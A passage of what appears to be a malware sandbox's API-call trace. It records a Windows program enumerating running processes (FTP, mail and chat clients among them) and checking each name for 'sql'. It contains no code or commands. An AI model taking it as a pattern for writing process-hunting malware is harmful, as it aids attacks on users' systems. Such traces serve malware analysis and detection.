lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0152.929] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0152.929] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0152.929] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0152.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.931] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3583c08 [0152.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3583c08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0152.931] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0152.931] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0152.931] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0153.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.120] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596be8 [0153.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3596be8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0153.120] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0153.121] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0153.121] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0153.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.122] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3583e60 [0153.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3583e60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0153.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0153.122] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0153.122] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0153.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0153.123] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596b08 [0153.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3596b08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0153.123] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0153.123] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0153.124] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0153.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0153.125] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585b20 [0153.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3585b20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0153.125] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0153.125] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0153.125] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0153.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.126] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583e90 [0153.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583e90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0153.126] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0153.126] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0153.126] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0153.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0153.128] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596c48 [0153.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3596c48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0153.128] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0153.128] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0153.128] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0153.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.129] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583ea8 [0153.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583ea8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0153.129] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0153.129] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0153.129] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0153.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.130] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583d10 [0153.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3583d10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0153.130] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0153.131] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0153.131] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0153.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.132] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583ec0 [0153.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3583ec0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0153.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0153.132] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0153.132] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0153.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.133] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583ed8 [0153.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583ed8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0153.133] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0153.133] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0153.133] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0153.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0153.135] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e318 [0153.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e318, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0153.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0153.135] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0153.136] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0153.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.137] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583d28 [0153.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3583d28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0153.137] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0153.137] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0153.137] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0153.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.139] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583bf0 [0153.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3583bf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0153.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0153.139] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0153.139] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0153.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.140] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35841c0 [0153.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35841c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0153.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0153.140] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0153.141] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0153.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0153.142] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596c08 [0153.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3596c08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0153.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0153.142] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0153.142] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0153.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.143] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596c28 [0153.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3596c28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0153.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0153.143] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0153.143] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0153.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0153.144] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e3e8 [0153.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e3e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0153.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0153.145] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0153.145] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0153.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.146] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35841d8 [0153.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35841d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0153.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0153.146] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0153.146] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0153.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0153.147] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3583fb0 [0153.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3583fb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0153.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0153.147] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0153.147] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0153.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.149] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583f08 [0153.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3583f08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0153.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0153.149] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0153.149] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0153.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.150] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35840b8 [0153.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35840b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0153.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0153.150] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0153.150] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0153.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.154] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583ff8 [0153.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, 